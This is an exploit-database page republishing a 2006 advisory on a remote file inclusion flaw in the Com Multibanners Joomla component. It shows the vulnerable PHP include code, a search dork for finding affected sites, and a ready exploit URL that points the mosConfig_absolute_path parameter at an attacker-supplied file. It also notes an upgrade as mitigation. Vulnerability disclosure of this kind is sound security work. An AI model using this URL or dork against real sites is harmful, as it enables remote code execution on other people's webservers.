header-logo
Suggest Exploit
vendor:
Com Multibanners
by:
Blue|Spy
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Com Multibanners
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Com Multibanners Remote File Inclusion (mosConfig_absolute_path)

A remote file inclusion vulnerability exists in Com Multibanners component for Joomla! CMS. The vulnerability is due to the 'extadminmenus.class.php' script not properly sanitizing user-supplied input to the 'mosConfig_absolute_path' parameter. This may allow a remote attacker to include a file from a remote host that contains arbitrary code and execute it in the context of the webserver process.

Mitigation:

Upgrade to the latest version of Com Multibanners component for Joomla! CMS.
Source

Exploit-DB raw data:

#############################SolpotCrew Community################################
#
# Com Multibanners Remote File Inclusion (mosConfig_absolute_path)
#
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt
#
#################################################################################
#
#
# Bug Found By :Blue|Spy
#
# contact: mail@blue-spy.net
#
# Website : http://kunamgede.biz, http://blue-spy.net
#
################################################################################
#
#
# Greetz: h4ntu , Fungky, Solpot, Matdhule
# and all crew #mardongan @ irc.dal.net
#
#
###############################################################################

code from extadminmenus.class.php

if (phpversion() < '4.2.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php41x.php' );
}

if (phpversion() < '4.3.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php42x.php' );
}

Dork:
inurl:com_multibanners

exploit:
http://site.com/[path]//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[attacker]

##############################MY LOVE JUST FOR U LIENA#########################
########################################################################

# milw0rm.com [2006-07-23]

Navigation

Suggest Exploit

Services By CQR